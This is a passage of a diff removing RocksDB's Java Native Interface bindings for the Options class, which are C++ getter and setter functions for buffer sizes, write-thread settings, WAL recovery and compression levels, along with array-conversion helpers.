-      static_cast<bool>(use_direct_reads);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    useDirectIoForFlushAndCompaction
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_useDirectIoForFlushAndCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->use_direct_io_for_flush_and_compaction;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setUseDirectIoForFlushAndCompaction
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setUseDirectIoForFlushAndCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean use_direct_io_for_flush_and_compaction) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->use_direct_io_for_flush_and_compaction =
-      static_cast<bool>(use_direct_io_for_flush_and_compaction);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAllowFAllocate
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAllowFAllocate(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_fallocate) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->allow_fallocate =
-      static_cast<bool>(jallow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    allowFAllocate
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_allowFAllocate(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->allow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    isFdCloseOnExec
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_isFdCloseOnExec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->is_fd_close_on_exec;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setIsFdCloseOnExec
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setIsFdCloseOnExec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean is_fd_close_on_exec) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->is_fd_close_on_exec =
-      static_cast<bool>(is_fd_close_on_exec);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    statsDumpPeriodSec
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_statsDumpPeriodSec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->stats_dump_period_sec;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setStatsDumpPeriodSec
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setStatsDumpPeriodSec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint stats_dump_period_sec) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->stats_dump_period_sec =
-      static_cast<int>(stats_dump_period_sec);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    adviseRandomOnOpen
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_adviseRandomOnOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->advise_random_on_open;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAdviseRandomOnOpen
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAdviseRandomOnOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean advise_random_on_open) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->advise_random_on_open =
-      static_cast<bool>(advise_random_on_open);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDbWriteBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setDbWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jdb_write_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->db_write_buffer_size = static_cast<size_t>(jdb_write_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    dbWriteBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_dbWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->db_write_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAccessHintOnCompactionStart
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setAccessHintOnCompactionStart(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jaccess_hint_value) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->access_hint_on_compaction_start =
-      rocksdb::AccessHintJni::toCppAccessHint(jaccess_hint_value);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    accessHintOnCompactionStart
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_accessHintOnCompactionStart(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb::AccessHintJni::toJavaAccessHint(
-      opt->access_hint_on_compaction_start);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setNewTableReaderForCompactionInputs
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setNewTableReaderForCompactionInputs(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jnew_table_reader_for_compaction_inputs) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->new_table_reader_for_compaction_inputs =
-      static_cast<bool>(jnew_table_reader_for_compaction_inputs);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    newTableReaderForCompactionInputs
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_newTableReaderForCompactionInputs(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<bool>(opt->new_table_reader_for_compaction_inputs);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompactionReadaheadSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setCompactionReadaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jcompaction_readahead_size) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->compaction_readahead_size =
-      static_cast<size_t>(jcompaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    compactionReadaheadSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_compactionReadaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->compaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setRandomAccessMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setRandomAccessMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jrandom_access_max_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->random_access_max_buffer_size =
-      static_cast<size_t>(jrandom_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    randomAccessMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_randomAccessMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->random_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWritableFileMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWritableFileMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jwritable_file_max_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->writable_file_max_buffer_size =
-      static_cast<size_t>(jwritable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    writableFileMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_writableFileMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->writable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    useAdaptiveMutex
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_useAdaptiveMutex(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->use_adaptive_mutex;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setUseAdaptiveMutex
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setUseAdaptiveMutex(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean use_adaptive_mutex) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->use_adaptive_mutex =
-      static_cast<bool>(use_adaptive_mutex);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    bytesPerSync
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_bytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->bytes_per_sync;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setBytesPerSync
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong bytes_per_sync) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->bytes_per_sync =
-      static_cast<int64_t>(bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWalBytesPerSync
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWalBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jwal_bytes_per_sync) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->wal_bytes_per_sync =
-      static_cast<int64_t>(jwal_bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    walBytesPerSync
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_walBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->wal_bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setEnableThreadTracking
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setEnableThreadTracking(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jenable_thread_tracking) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->enable_thread_tracking = static_cast<bool>(jenable_thread_tracking);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    enableThreadTracking
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_enableThreadTracking(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->enable_thread_tracking);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDelayedWriteRate
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setDelayedWriteRate(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jdelayed_write_rate) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->delayed_write_rate = static_cast<uint64_t>(jdelayed_write_rate);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    delayedWriteRate
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_delayedWriteRate(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->delayed_write_rate);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAllowConcurrentMemtableWrite
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAllowConcurrentMemtableWrite(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      allow_concurrent_memtable_write = static_cast<bool>(allow);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    allowConcurrentMemtableWrite
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_allowConcurrentMemtableWrite(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->
-      allow_concurrent_memtable_write;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setEnableWriteThreadAdaptiveYield
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setEnableWriteThreadAdaptiveYield(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean yield) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      enable_write_thread_adaptive_yield = static_cast<bool>(yield);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    enableWriteThreadAdaptiveYield
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_enableWriteThreadAdaptiveYield(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->
-      enable_write_thread_adaptive_yield;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWriteThreadMaxYieldUsec
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWriteThreadMaxYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      write_thread_max_yield_usec = static_cast<int64_t>(max);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    writeThreadMaxYieldUsec
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_writeThreadMaxYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->
-      write_thread_max_yield_usec;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWriteThreadSlowYieldUsec
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWriteThreadSlowYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong slow) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      write_thread_slow_yield_usec = static_cast<int64_t>(slow);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    writeThreadSlowYieldUsec
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_writeThreadSlowYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->
-      write_thread_slow_yield_usec;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setSkipStatsUpdateOnDbOpen
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setSkipStatsUpdateOnDbOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jskip_stats_update_on_db_open) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->skip_stats_update_on_db_open =
-      static_cast<bool>(jskip_stats_update_on_db_open);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    skipStatsUpdateOnDbOpen
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_skipStatsUpdateOnDbOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->skip_stats_update_on_db_open);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWalRecoveryMode
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setWalRecoveryMode(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jwal_recovery_mode_value) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->wal_recovery_mode =
-      rocksdb::WALRecoveryModeJni::toCppWALRecoveryMode(
-          jwal_recovery_mode_value);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    walRecoveryMode
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_walRecoveryMode(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb::WALRecoveryModeJni::toJavaWALRecoveryMode(
-      opt->wal_recovery_mode);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAllow2pc
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAllow2pc(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_2pc) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->allow_2pc = static_cast<bool>(jallow_2pc);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    allow2pc
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_allow2pc(JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->allow_2pc);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setRowCache
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setRowCache(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrow_cache_handle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  auto* row_cache = reinterpret_cast<std::shared_ptr<rocksdb::Cache>*>(jrow_cache_handle);
-  opt->row_cache = *row_cache;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setFailIfOptionsFileError
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setFailIfOptionsFileError(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jfail_if_options_file_error) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->fail_if_options_file_error =
-      static_cast<bool>(jfail_if_options_file_error);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    failIfOptionsFileError
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_failIfOptionsFileError(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->fail_if_options_file_error);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDumpMallocStats
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setDumpMallocStats(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jdump_malloc_stats) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->dump_malloc_stats = static_cast<bool>(jdump_malloc_stats);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    dumpMallocStats
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_dumpMallocStats(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->dump_malloc_stats);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAvoidFlushDuringRecovery
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAvoidFlushDuringRecovery(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean javoid_flush_during_recovery) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->avoid_flush_during_recovery = static_cast<bool>(javoid_flush_during_recovery);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    avoidFlushDuringRecovery
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_avoidFlushDuringRecovery(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->avoid_flush_during_recovery);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAvoidFlushDuringShutdown
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAvoidFlushDuringShutdown(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean javoid_flush_during_shutdown) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->avoid_flush_during_shutdown = static_cast<bool>(javoid_flush_during_shutdown);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    avoidFlushDuringShutdown
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_avoidFlushDuringShutdown(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->avoid_flush_during_shutdown);
-}
-
-/*
- * Method:    tableFactoryName
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_Options_tableFactoryName(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  rocksdb::TableFactory* tf = opt->table_factory.get();
-
-  // Should never be nullptr.
-  // Default memtable factory is SkipListFactory
-  assert(tf);
-
-  return env->NewStringUTF(tf->Name());
-}
-
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    minWriteBufferNumberToMerge
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_minWriteBufferNumberToMerge(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->min_write_buffer_number_to_merge;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMinWriteBufferNumberToMerge
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMinWriteBufferNumberToMerge(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jmin_write_buffer_number_to_merge) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->min_write_buffer_number_to_merge =
-          static_cast<int>(jmin_write_buffer_number_to_merge);
-}
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxWriteBufferNumberToMaintain
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxWriteBufferNumberToMaintain(JNIEnv* env,
-                                                             jobject jobj,
-                                                             jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->max_write_buffer_number_to_maintain;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxWriteBufferNumberToMaintain
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxWriteBufferNumberToMaintain(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jmax_write_buffer_number_to_maintain) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->max_write_buffer_number_to_maintain =
-      static_cast<int>(jmax_write_buffer_number_to_maintain);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompressionType
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jcompression_type_value) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opts->compression = rocksdb::CompressionTypeJni::toCppCompressionType(
-      jcompression_type_value);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    compressionType
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_compressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb::CompressionTypeJni::toJavaCompressionType(
-      opts->compression);
-}
-
-/**
- * Helper method to convert a Java byte array of compression levels
- * to a C++ vector of rocksdb::CompressionType
- *
- * @param env A pointer to the Java environment
- * @param jcompression_levels A reference to a java byte array
- *     where each byte indicates a compression level
- *
- * @return A unique_ptr to the vector, or unique_ptr(nullptr) if a JNI exception occurs
- */
-std::unique_ptr<std::vector<rocksdb::CompressionType>> rocksdb_compression_vector_helper(
-    JNIEnv* env, jbyteArray jcompression_levels) {
-  jsize len = env->GetArrayLength(jcompression_levels);
-  jbyte* jcompression_level =
-      env->GetByteArrayElements(jcompression_levels, nullptr);
-  if(jcompression_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return std::unique_ptr<std::vector<rocksdb::CompressionType>>();
-  }
-
-  auto* compression_levels = new std::vector<rocksdb::CompressionType>();
-  std::unique_ptr<std::vector<rocksdb::CompressionType>> uptr_compression_levels(compression_levels);
-
-  for(jsize i = 0; i < len; i++) {
-    jbyte jcl = jcompression_level[i];
-    compression_levels->push_back(static_cast<rocksdb::CompressionType>(jcl));
-  }
-
-  env->ReleaseByteArrayElements(jcompression_levels, jcompression_level,
-      JNI_ABORT);
-
-  return uptr_compression_levels;
-}
-
-/**
- * Helper method to convert a C++ vector of rocksdb::CompressionType
- * to a Java byte array of compression levels
- *
- * @param env A pointer to the Java environment
- * @param jcompression_levels A reference to a java byte array
- *     where each byte indicates a compression level
- *
- * @return A jbytearray or nullptr if an exception occurs
- */
-jbyteArray rocksdb_compression_list_helper(JNIEnv* env,
-    std::vector<rocksdb::CompressionType> compression_levels) {
-  const size_t len = compression_levels.size();
-  jbyte* jbuf = new jbyte[len];
-
-  for (size_t i = 0; i < len; i++) {
-      jbuf[i] = compression_levels[i];
-  }
-
-  // insert in java array
-  jbyteArray jcompression_levels = env->NewByteArray(static_cast<jsize>(len));
-  if(jcompression_levels == nullptr) {
-      // exception thrown: OutOfMemoryError
-      delete [] jbuf;
-      return nullptr;
-  }
-  env->SetByteArrayRegion(jcompression_levels, 0, static_cast<jsize>(len),
-      jbuf);
-  if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jcompression_levels);
-      delete [] jbuf;
-      return nullptr;
-  }
-
-  delete [] jbuf;
-
-  return jcompression_levels;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompressionPerLevel
- * Signature: (J[B)V
- */
-void Java_org_rocksdb_Options_setCompressionPerLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jbyteArray jcompressionLevels) {
-  auto uptr_compression_levels =
-      rocksdb_compression_vector_helper(env, jcompressionLevels);
-  if(!uptr_compression_levels) {
-    // exception occurred
-    return;
-  }
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  options->compression_per_level = *(uptr_compression_levels.get());
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    compressionPerLevel
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_Options_compressionPerLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb_compression_list_helper(env,
-      options->compression_per_level);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setBottommostCompressionType
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setBottommostCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jcompression_type_value) {
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  options->bottommost_compression =
-      rocksdb::CompressionTypeJni::toCppCompressionType(
-          jcompression_type_value);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    bottommostCompressionType
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_bottommostCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb::CompressionTypeJni::toJavaCompressionType(
-      options->bottommost_compression);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompressionOptions
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setCompressionOptions(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jcompression_options_handle) {
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  auto* compression_options =
-      reinterpret_cast<rocksdb::CompressionOptions*>(jcompression_options_handle);
-  options->compression_opts = *compression_options;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompactionStyle
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setCompactionStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte compaction_style) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->compaction_style =
-      static_cast<rocksdb::CompactionStyle>(compaction_style);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    compactionStyle
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_compactionStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->compaction_style;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxTableFilesSizeFIFO
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxTableFilesSizeFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jmax_table_files_size) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->compaction_options_fifo.max_table_files_size =
-    static_cast<uint64_t>(jmax_table_files_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxTableFilesSizeFIFO
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxTableFilesSizeFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->compaction_options_fifo.max_table_files_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    numLevels
- * Signature: (J)I
- */
